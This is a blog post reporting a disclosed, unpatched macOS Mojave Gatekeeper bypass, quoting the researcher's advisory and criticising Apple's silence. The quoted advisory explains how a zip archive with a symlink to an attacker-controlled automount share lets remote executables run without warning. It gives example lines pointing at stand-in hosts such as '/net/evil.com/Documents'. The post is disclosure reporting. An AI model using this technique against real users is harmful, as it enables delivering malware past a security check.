Unpatched macOS Mojave Vulnerability Exposed…. And Apple Hasn’t Fixed It…WTF?

There’s a new macOS Mojave vulnerability that has been disclosed. The vulnerability is that there is a way to bypass the Gatekeeper security functionality of macOS. Filippo Cavallarin has publicized this vulnerability today after the 90 day window that Apple had to fix it expired. Here’s the details:

The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a “special” path, in this case, any path beginning with “/net/”.

For example ‘ls /net/evil-attacker.com/sharedfolder/’ will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.

The second legit feature is that zip archives can contain symbolic links pointing to an arbitrary location (including automount enpoints) and that the software on MacOS that is responsable to decompress zip files do not perform any check on the symlinks before creatig them.

Here’s an example of how this would work:

To better understand how this exploit works, let’s consider the following scenario: An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim.

The victim downloads the malicious archive, extracts it and follows the symlink.

Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot.

And there’s a video showing the exploit in action:

At this point the vulnerability is unpatched in macOS Mojave 10.14.5. What’s worse is Cavallarin says Apple has stopped responding to his emails. Which is shameful on Apple’s part. For a company who claims to want to protect their users, you would expect better from them.

Advertisements

3 Responses to “Unpatched macOS Mojave Vulnerability Exposed…. And Apple Hasn’t Fixed It…WTF?”

  1. […] off the heels of this vulnerability that Apple hasn’t seen fit to fix comes another one that I would rate as dangerous and is […]

  2. Shapla.co.kr

    Unpatched macOS Mojave Vulnerability Exposed…. And Apple Hasn’t Fixed It…WTF? | The IT Nerd

  3. […] might recall that I told you about a macOS Mojave vulnerability in which there is a way to bypass the Gatekeeper security functionality of macOS. And what’s […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: